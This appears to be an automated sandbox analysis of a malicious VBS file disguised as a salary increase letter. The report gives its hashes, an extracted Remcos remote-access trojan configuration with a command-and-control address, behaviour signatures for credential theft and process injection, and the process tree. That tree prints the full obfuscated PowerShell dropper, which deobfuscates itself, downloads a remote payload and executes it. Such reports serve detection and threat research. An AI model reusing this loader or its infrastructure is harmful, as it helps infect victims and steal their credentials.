Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 09:12

General

  • Target

    SalaryIncreaseLetter_Oct2024.vbs

  • Size

    35KB

  • MD5

    487fcfcc1cb2d0a2f46618ee515bd75f

  • SHA1

    946401dfded730d640409b73842063ec9d341367

  • SHA256

    46e052d1dcd2455c656a4f96ce8a6ab32d0c3b4cdc151094df100b0c14b1ba64

  • SHA512

    bff7a5dcd094dd7fcb388ac8dab2bd8d594d687f2dd0ffb56c01c9d100ff3793c4276ee92f85603627485b88465625ad122860c72c9c04b609cfe3d02bc2aa15

  • SSDEEP

    768:txZds33MwWhyfVn6SXATY1ywPEQwuS4fuUJ0tx/QxjHewenn:vZdsHzWMGT6ZEOSURJ0vQxvc

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.17.14:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-KC5V8F

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SalaryIncreaseLetter_Oct2024.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3612
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ielyfbirlnhatxlmrkauiwn"
        3⤵
          PID:3924
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ielyfbirlnhatxlmrkauiwn"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4444
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\thyqguskzvzfvdzqivmwtbickpd"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:4452
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vbdbgmdmndjkgrourghpeodttwmkqt"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4336

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      2247453c28acd1eb75cfe181540458a8

      SHA1

      851fc5a9950d422d76163fdc6a453d6859d56660

      SHA256

      358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

      SHA512

      42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq3ubrzq.5ok.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\ielyfbirlnhatxlmrkauiwn

      Filesize

      4KB

      MD5

      79f35c7500a5cc739c1974804710441f

      SHA1

      24fdf1fa45049fc1a83925c45357bc3058bad060

      SHA256

      897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4

      SHA512

      03281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e

    • C:\Users\Admin\AppData\Roaming\Foregrib.ses

      Filesize

      440KB

      MD5

      3d3dbb0e90c5b97b9b63be3573337577

      SHA1

      73373ef708b2a92fa3a66fbe7ca1d8d1892917a6

      SHA256

      67028f4a738865dbbd967fc48eed2b3e044a284eaff234bd79bf86e3abbfa74d

      SHA512

      35c03214e01fd725df5232cf6228549f5f0943bcffb78ef3d1c3f0c056cc047995ebe7aa64ca70e04a97a99f0fb43c7aeb90daca699e71e1f9f249136ded3862

    • memory/3612-2-0x00007FFD6E7C3000-0x00007FFD6E7C5000-memory.dmp

      Filesize

      8KB

    • memory/3612-9-0x000002517DBD0000-0x000002517DBF2000-memory.dmp

      Filesize

      136KB

    • memory/3612-13-0x00007FFD6E7C0000-0x00007FFD6F281000-memory.dmp

      Filesize

      10.8MB

    • memory/3612-14-0x00007FFD6E7C0000-0x00007FFD6F281000-memory.dmp

      Filesize

      10.8MB

    • memory/3612-17-0x00007FFD6E7C0000-0x00007FFD6F281000-memory.dmp

      Filesize

      10.8MB

    • memory/3612-18-0x00007FFD6E7C0000-0x00007FFD6F281000-memory.dmp

      Filesize

      10.8MB

    • memory/3612-21-0x00007FFD6E7C0000-0x00007FFD6F281000-memory.dmp

      Filesize

      10.8MB

    • memory/4336-55-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4336-62-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4336-63-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4444-59-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4444-58-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4444-61-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4444-53-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4452-60-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4452-56-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4452-54-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4564-26-0x0000000005AC0000-0x0000000005B26000-memory.dmp

      Filesize

      408KB

    • memory/4564-24-0x00000000059B0000-0x00000000059D2000-memory.dmp

      Filesize

      136KB

    • memory/4564-46-0x0000000008AF0000-0x000000000E43F000-memory.dmp

      Filesize

      89.3MB

    • memory/4564-22-0x0000000002950000-0x0000000002986000-memory.dmp

      Filesize

      216KB

    • memory/4564-23-0x0000000005350000-0x0000000005978000-memory.dmp

      Filesize

      6.2MB

    • memory/4564-43-0x00000000074D0000-0x00000000074F2000-memory.dmp

      Filesize

      136KB

    • memory/4564-42-0x0000000007530000-0x00000000075C6000-memory.dmp

      Filesize

      600KB

    • memory/4564-41-0x0000000006860000-0x000000000687A000-memory.dmp

      Filesize

      104KB

    • memory/4564-40-0x0000000007910000-0x0000000007F8A000-memory.dmp

      Filesize

      6.5MB

    • memory/4564-39-0x0000000006300000-0x000000000634C000-memory.dmp

      Filesize

      304KB

    • memory/4564-38-0x00000000062D0000-0x00000000062EE000-memory.dmp

      Filesize

      120KB

    • memory/4564-36-0x0000000005C70000-0x0000000005FC4000-memory.dmp

      Filesize

      3.3MB

    • memory/4564-25-0x0000000005A50000-0x0000000005AB6000-memory.dmp

      Filesize

      408KB

    • memory/4564-44-0x0000000008540000-0x0000000008AE4000-memory.dmp

      Filesize

      5.6MB

    • memory/5024-75-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-52-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-69-0x0000000022C10000-0x0000000022C29000-memory.dmp

      Filesize

      100KB

    • memory/5024-72-0x0000000022C10000-0x0000000022C29000-memory.dmp

      Filesize

      100KB

    • memory/5024-73-0x0000000022C10000-0x0000000022C29000-memory.dmp

      Filesize

      100KB

    • memory/5024-74-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-47-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-76-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-79-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-78-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-77-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-80-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-81-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

    • memory/5024-82-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB